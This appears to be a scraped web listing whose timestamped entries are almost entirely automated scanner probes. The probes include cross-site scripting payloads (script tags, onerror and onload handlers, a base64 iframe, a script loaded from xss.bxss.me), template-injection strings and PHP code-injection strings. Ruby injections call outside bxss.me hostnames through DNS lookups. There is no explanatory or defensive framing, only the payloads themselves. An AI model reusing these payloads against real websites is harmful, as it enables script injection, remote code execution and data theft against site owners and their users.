 • pHqghUme<img/src=">" onerror=alert(9928)>

  2021-05-06 04:18:37


  1


 • pHqghUme<img src=xyz OnErRor=h1fy(9365)>

  2021-05-06 04:18:32


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=h1fy(9387)>

  2021-05-06 04:18:27


  1


 • pHqghUme<body onload=h1fy(9145)>

  2021-05-06 04:18:23


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9691'>

  2021-05-06 04:18:18


  1


 • pHqghUme<isindex type=image src=1 onerror=h1fy(9034)>

  2021-05-06 04:18:13


  1


 • pHqghUme<ScRiPt >h1fy(9703)</ScRiPt>

  2021-05-06 04:18:05


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9898></ScRiPt>

  2021-05-06 04:17:59


  1


 • pHqghUme<ScRiPt >h1fy(9456)</ScRiPt>

  2021-05-06 04:17:54


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%68%31%66%79%28%39%39%33%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 04:17:47


  1


 • pHqghUme<script>h1fy(9757)</script>

  2021-05-06 04:17:42


  1


 • pHqghUme<W7Z1KT>F53VY[!+!]</W7Z1KT>

  2021-05-06 04:17:37


  1


 • pHqghUme<ScRiPt >h1fy(9148)</ScRiPt>

  2021-05-06 04:17:32


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 04:17:28


  1


 • acx__${98991*97996}__::.x

  2021-05-06 04:17:24


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 04:17:20


  1


 • pHqghUme

  2021-05-06 04:17:20


  1


 • acx{{98991*97996}}xca

  2021-05-06 04:17:15


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 04:17:12


  1


 • <th:t="${acx}#foreach

  2021-05-06 04:17:08


  1


 • pHqghUme

  2021-05-06 04:17:03


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 04:17:02


  1


 • acux2507%C0%BEz1%C0%BCz2a%90bcxuca2507

  2021-05-06 04:16:54


  1


 • acu2689%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2689

  2021-05-06 04:16:48


  1


 • pHqghUme9037866

  2021-05-06 04:16:44


  1


 • '"()&%<acx><ScRiPt >h1fy(9604)</ScRiPt>

  2021-05-06 04:16:39


  1


 • pHqghUme'"()&%<acx><ScRiPt >h1fy(9079)</ScRiPt>

  2021-05-06 04:16:35


  1


 • pHqghUme

  2021-05-06 04:16:30


  1


 • pHqghUme

  2021-05-06 04:16:26


  1


 • pHqghUme

  2021-05-06 04:16:22


  1


 • pHqghUme

  2021-05-06 04:16:19


  1


 • pHqghUme

  2021-05-06 04:16:15


  1


 • pHqghUme

  2021-05-06 04:16:11


  1


 • pHqghUme

  2021-05-06 04:16:07


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 04:16:07


  '"


 • pHqghUme

  2021-05-06 04:16:07


  <!--


 • pHqghUme

  2021-05-06 04:16:06


  ${@print(md5(31337))}


 • '"

  2021-05-06 04:16:06


  1


 • pHqghUme

  2021-05-06 04:16:06


  ${@print(md5(31337))}\


 • <!--

  2021-05-06 04:16:06


  1


 • pHqghUme

  2021-05-06 04:16:05


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 04:16:05


  1


 • pHqghUme

  2021-05-06 04:16:04


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • pHqghUme

  2021-05-06 04:16:04


  1


 • pHqghUme

  2021-05-06 04:16:04


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 04:16:04


  1


 • ${@print(md5(31337))}\

  2021-05-06 04:16:03


  1


 • '.print(md5(31337)).'

  2021-05-06 04:16:03


  1


 • pHqghUme

  2021-05-06 04:16:03


  1


 • ";print(md5(31337));$a="

  2021-05-06 04:16:02


  1


 • pHqghUme

  2021-05-06 04:16:02


  /xfs.bxss.me


 • ${@print(md5(31337))}

  2021-05-06 04:16:02


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 04:16:01


  1


 • pHqghUme

  2021-05-06 04:16:01


  1


 • ';print(md5(31337));$a='

  2021-05-06 04:16:01


  1


 • /xfs.bxss.me

  2021-05-06 04:16:01


  1


 • pHqghUme

  2021-05-06 04:16:00


  1


 • pHqghUme

  2021-05-06 04:16:00


  "+"A".concat(70-3).concat(22*4).concat(122).concat(83).concat(105).concat(75)+(require"socket" Socket.gethostbyname("hitvk"+"elbjchgn9dc88.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 04:16:00


  1


 • pHqghUme

  2021-05-06 04:16:00


  '+'A'.concat(70-3).concat(22*4).concat(111).concat(74).concat(100).concat(77)+(require'socket' Socket.gethostbyname('hittb'+'dcbrwlmo750ec.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 04:15:59


  1


 • '+'A'.concat(70-3).concat(22*4).concat(100).concat(66).concat(107).concat(88)+(require'socket' Socket.gethostbyname('hitnv'+'fgnvclsgf4a3d.bxss.me.')[3].to_s)+'

  2021-05-06 04:15:59


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 04:15:58


  1


 • pHqghUme

  2021-05-06 04:15:58


  1


 • pHqghUme

  2021-05-06 04:15:58


  1


 • pHqghUme

  2021-05-06 04:15:58


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 04:15:58


  1


 • "+"A".concat(70-3).concat(22*4).concat(116).concat(85).concat(97).concat(74)+(require"socket" Socket.gethostbyname("hitvv"+"srqmyhbj8935f.bxss.me.")[3].to_s)+"

  2021-05-06 04:15:58


  1


 • pHqghUme

  2021-05-06 04:15:57


  1


 • pHqghUme

  2021-05-06 04:15:57


  1


 • pHqghUme

  2021-05-06 04:15:57


  1


 • pHqghUme

  2021-05-06 04:15:57


  1


 • pHqghUme

  2021-05-06 04:15:56


  1


 • pHqghUme

  2021-05-06 04:15:56


  1


 • pHqghUme

  2021-05-06 04:15:56


  1


 • pHqghUme

  2021-05-06 04:15:56


  1


 • pHqghUme

  2021-05-06 04:15:55


  1